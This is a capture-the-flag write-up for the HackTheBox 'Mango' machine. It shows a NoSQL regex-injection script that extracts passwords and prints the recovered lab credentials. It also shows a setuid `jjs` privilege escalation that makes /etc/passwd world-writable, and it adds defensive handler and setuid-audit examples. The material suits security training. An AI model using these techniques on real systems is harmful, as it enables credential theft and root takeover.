# HackTheBox - Mango

![](/files/-MZhxH01KZOkXMzqwaP_)

### Nmap scan results

![](/files/-MZhzIHNg4SIvbIruZG9)

We have two web servers, one serving HTTP and the other HTTPS. Let's add **`staging-order.mango.htb`** to the /etc/hosts file. Two different websites are running on staging-order.mango.htb: one over **HTTP** and the other over **HTTPS**.

![HTTPS Website](/files/-MZi-c1tcP5KAoYDXK8N)

![HTTP Website](/files/-MZi-h3EsIHlvfsc6xIn)

I tried SQL injection on the **Mango Search Page** but didn't get anything. Let's scan the website with gobuster for files and directories.

### Scanning with gobuster

```bash
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://staging-order.mango.htb/ -x php,html,txt -o go-dirscan.out -t 50
```

![](/files/-MZi0Z8HxGt3SOlj1IWP)

The login page on the insecure (HTTP) website looks suspicious. Let's try SQL injection on it.

### Trying SQL Injection on login page

![](/files/-MZi1IVSlTTFft1w8DN7)

I tried all possible SQL injection payloads, but that didn't give me anything. `Also tried the sqlmap tool to automate the process, but no luck :((`

### Performing NoSQL Injection on login page

We can also try NoSQL injection, as the name of the box is similar to **`Mongo`**, which is a NoSQL database (it uses **key-value** pairs to store the values).

{% embed url="<https://book.hacktricks.xyz/pentesting-web/nosql-injection>" %}

{% hint style="info" %}
**NoSQL injection** vulnerabilities allow attackers to **inject** code into commands for databases that don't use SQL queries, such as **MongoDB**.
{% endhint %}

![](/files/-MZi340rGL0VS-c_3PaE)

Now, if you check the response, it is a redirect to the **`home.php`** page.

![](/files/-MZi3Mb1soAFdDx-P74S)

![](/files/-MZi3oNqHaGp4IQvGx9L)

### Extracting usernames and passwords

But that doesn't give us anything. We can also enumerate the data and users using the same method. I have created a script to get all the users and their passwords.

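```python
#!/usr/bin/env python3

import requests
import string

url = "http://staging-order.mango.htb/index.php"
#chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!&(),-:;<=>@^_{}~`-[]?+"
# Letters and digits are used as-is; punctuation and whitespace are
# backslash-escaped so the regex matches them literally.
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\" + c for c in string.punctuation + string.whitespace]

# Defined for routing through a local intercepting proxy; not passed to requests below.
proxies = {'http': "127.0.0.1:8080"}
passw = "^"  # anchor the regex at the start of the password

for i in range(20):
    print("[+] Position: %s" % i)
    for char in possible_chars:
        payload = {
            "username[$eq]": "admin",
            "password[$regex]": passw + char,
            "login": "login",
        }
        res = requests.post(url, data=payload, allow_redirects=True)
        # The page reached after a successful login contains admin@mango.htb
        if "admin@mango.htb" in res.text:
            print("[+] Found: %s" % (passw + char))
            passw += char
            break
    else:
        # No candidate extended the match, so the password is complete
        break

print("[+] Completed")
```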

![](/files/-MZi6wenY-rsXjmAoq7m)

Similarly, we can also enumerate the user and get the password for that user as well.

```markup
# Got creds
admin : t9KcS3>!0B#2
mango : h3mXK8RhU~f{]f5H
```
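Why the bracketed `username[$eq]` / `password[$regex]` parameters work, and the server-side check that stops them, as an added example that is not the box's code or part of the original write-up. It assumes a PHP-style parameter decoder and uses a tiny in-memory stand-in for the MongoDB match; the account and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample account, not data from the box.
USERS = [{"username": "alice", "password": "S3cret!pw"}]

def php_style_params(body):
    """Decode a form body as PHP does: 'a[k]=v' becomes {'a': {'k': 'v'}}."""
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", key)
        if not m:
            params[key] = value
            continue
        name, sub = m.groups()
        if not isinstance(params.get(name), dict):
            params[name] = {}
        params[name][sub] = value
    return params

def field_matches(stored, cond):
    """Minimal stand-in for MongoDB matching: equality, $eq and $regex only."""
    if not isinstance(cond, dict):
        return stored == cond
    ops = {"$eq": lambda v: stored == v,
           "$regex": lambda v: re.search(v, stored) is not None}
    return all(op in ops and ops[op](v) for op, v in cond.items())

def login_vulnerable(body):
    """Passes decoded parameters straight into the query document."""
    p = php_style_params(body)
    query = {"username": p.get("username"), "password": p.get("password")}
    return any(all(field_matches(u[k], c) for k, c in query.items())
               for u in USERS)

def login_hardened(body):
    """Accepts only scalar strings, so operator objects never reach the query."""
    p = php_style_params(body)
    user, pw = p.get("username"), p.get("password")
    if not (isinstance(user, str) and isinstance(pw, str)):
        return False
    return any(u["username"] == user and u["password"] == pw for u in USERS)

def operator_fields(body):
    """Detection helper: list 'field[$op]' pairs worth logging or blocking."""
    return sorted(f"{name}[{op}]" for name, val in php_style_params(body).items()
                  if isinstance(val, dict) for op in val if op.startswith("$"))
```

The vulnerable handler answers true or false to a regex guess about the stored password, which is the oracle the script relies on; the hardened handler rejects any non-string field, and `operator_fields` gives a value to alert on in request logs.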

### Using SSH to get access as mango user

![](/files/-MZi6YdlkgHNUz4GDDBk)

![Using previously found password for admin](/files/-MZi7YGvsGlLuZNC-TBj)

### Privilege Escalation using [jjs](https://docs.oracle.com/javase/8/docs/technotes/tools/unix/jjs.html) (Java JavaScript)

{% hint style="info" %}
If you wonder what **jjs** stands for, it stands for **Java** JavaScript. The command is located in the `JDK_HOME\bin` directory. The command can be used to run scripts in files or scripts entered on the command line in interactive mode. It can also be used to execute shell scripts.
{% endhint %}

```bash
find / -perm -u=s -type f 2>/dev/null
```

![](/files/-MZi8T7gaIju9Jp_rKkf)

```javascript
// JJS Script to get command execution
Java.type('java.lang.Runtime').getRuntime().exec('chmod 777 /etc/passwd')
```

![](/files/-MZiCmtDA0YvhbCrVV7v)

Now we can edit the /etc/passwd file and change the root password. **`This is one way.`**

Another way is to copy the **bash** binary to the tmp directory and then change its permissions to **`4555`** (setuid permissions).

![](/files/-MZiEEJuhXAoZ5EEUSiO)
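The same setuid search turned into a defender's audit, as an added example that is not part of the original write-up: it flags root-owned setuid files that are script or command runners (such as `jjs`, or a copied `bash`) and any setuid file outside a baseline. The baseline, the runner list and the function names are assumptions to adapt per host.

```python
import os
import stat

# Assumed baseline of setuid binaries expected on a stock server (illustrative).
EXPECTED = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/mount"}
# Assumed list of script/command runners that should never be setuid root.
RUNNERS = {"jjs", "bash", "sh", "python3", "perl", "ruby", "node"}

def suid_entries(root="/"):
    """Yield (path, mode, uid) for every setuid regular file under root."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode, st.st_uid

def audit(entries, expected=EXPECTED):
    """Return sorted (severity, path) findings for root-owned setuid files."""
    findings = []
    for path, mode, uid in entries:
        if uid != 0 or not mode & stat.S_ISUID:
            continue
        if os.path.basename(path) in RUNNERS:
            findings.append(("critical", path))  # runs caller-supplied code as root
        elif path not in expected:
            findings.append(("review", path))    # not in the baseline
    return sorted(findings)

if __name__ == "__main__":
    for severity, path in audit(suid_entries("/")):
        print(severity, path)
```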

